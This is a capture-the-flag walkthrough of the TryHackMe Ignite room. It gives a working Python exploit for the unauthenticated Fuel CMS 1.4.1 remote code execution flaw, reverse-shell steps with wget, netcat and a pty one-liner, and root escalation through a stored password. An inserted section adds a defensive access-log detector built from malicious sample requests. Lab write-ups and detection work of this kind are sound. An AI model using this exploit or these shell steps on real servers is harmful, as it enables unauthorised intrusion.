THM Ignite Walkthrough

A new start-up has a few issues with their web server.
TryHackMe Room: here

Information Gathering

Let's start by enumerating the THM Ignite machine with an nmap port scan:

sudo nmap -p 1-5000 -sV -sC -v 10.10.

The only open port in the specified range seems to be port 80, with Apache httpd 2.4.18 ((Ubuntu)) running on it.

Browsing the website we are greeted with a page that looks like the default page for FUEL CMS.

The CMS itself is located at /fuel and some research showed that the default credentials are admin:admin.


Exploiting Fuel CMS

Using those default credentials we are able to log in to the CMS as admin, though this is not necessary, as I am going to exploit an Unauthenticated Remote Code Execution vulnerability in Fuel CMS version 1.4.1.

I got some information about the vulnerability at exploit-db and used it to create my own exploit script that gave me a basic "shell".

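import requests
import urllib.parse

# Base URL of the target machine
base_url = 'http://10.10.68.123'

while True:
    cmd = input('> ')
    # Build the request from the base URL each time, so the payload of a
    # previous command is not carried over into the next request
    url = base_url + '/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27' + urllib.parse.quote(cmd) + '%27%29%2b%27'
    result = requests.get(url, timeout=5).text
    # The command output sits between the first </div> and the next <div
    print(result.split('</div>')[1].split('<div')[0].strip())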

That script allowed me to execute basic commands like whoami, ls or wget.
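
Seen from the defender's side, the request built by the script above stands out in the web server's access log: the filter parameter of /fuel/pages/select/ carries URL-encoded PHP instead of a search term. The following detection sketch is an added example, not part of the original walkthrough; the log lines are constructed samples and the pattern list is an assumed heuristic.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Request line of an Apache common/combined log entry: "METHOD target HTTP/x.y"
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

# Heuristics (assumptions, tune for your site): a legitimate filter value is a
# plain search term, so PHP string breakout, variable calls and exec-style
# function names are all suspicious.
SUSPICIOUS = [
    ("quote-concatenation", re.compile(r"['\"]\s*[+.]")),
    ("php-variable-call", re.compile(r"\$\w+\s*\(")),
    ("exec-function", re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval|assert)\b", re.I)),
]

# Constructed sample log lines (documentation IP ranges, made-up timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [01/Jan/2024:10:00:00 +0000] "GET /fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27whoami%27%29%2b%27 HTTP/1.1" 200 1234 "-" "python-requests/2.31.0"',
    '198.51.100.4 - - [01/Jan/2024:10:01:00 +0000] "GET /fuel/pages/select/?filter=about HTTP/1.1" 200 2100 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [01/Jan/2024:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

def inspect_line(line):
    """Return (client_ip, decoded_filter, reasons) for a suspicious line, else None."""
    m = REQUEST_RE.search(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Match the endpoint even when Fuel CMS is installed in a subdirectory.
    if not parts.path.rstrip("/").lower().endswith("/fuel/pages/select"):
        return None
    # parse_qs percent-decodes the value, so encoded payloads are checked in clear.
    for value in parse_qs(parts.query, keep_blank_values=True).get("filter", []):
        reasons = [name for name, rx in SUSPICIOUS if rx.search(value)]
        if reasons:
            return (line.split(" ", 1)[0], value, reasons)
    return None

def scan(lines):
    """Return the findings for every suspicious line in an iterable of log lines."""
    return [hit for hit in map(inspect_line, lines) if hit]

if __name__ == "__main__":
    for ip, value, reasons in scan(SAMPLE_LOG):
        print(f"{ip} filter={value!r} reasons={','.join(reasons)}")
```

Run against a real access log, the decoded filter value also shows which command each request carried, which helps when reconstructing what happened on the host.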

Using wget I downloaded a feature-rich PHP reverse shell (pentestmonkey) to the target by starting a local http server:

Next, I set up a netcat listener on my attacking machine (nc -lvnp 4545) and browsed shell.php on the webserver.

You can stabilize the reverse shell by creating a TTY shell using python: python3 -c "import pty;pty.spawn('/bin/bash')".

Now we have access to the server as www-data and are able to obtain the user flag.


Privilege Escalation

The privilege escalation for the TryHackMe Ignite room was fairly easy: you just have to find the needed piece of information.

After some enumeration I found a file called database.php in /var/www/html/fuel/application/config containing the root password.

All you have to do is type in su and the password, and you have escalated your privileges to root.

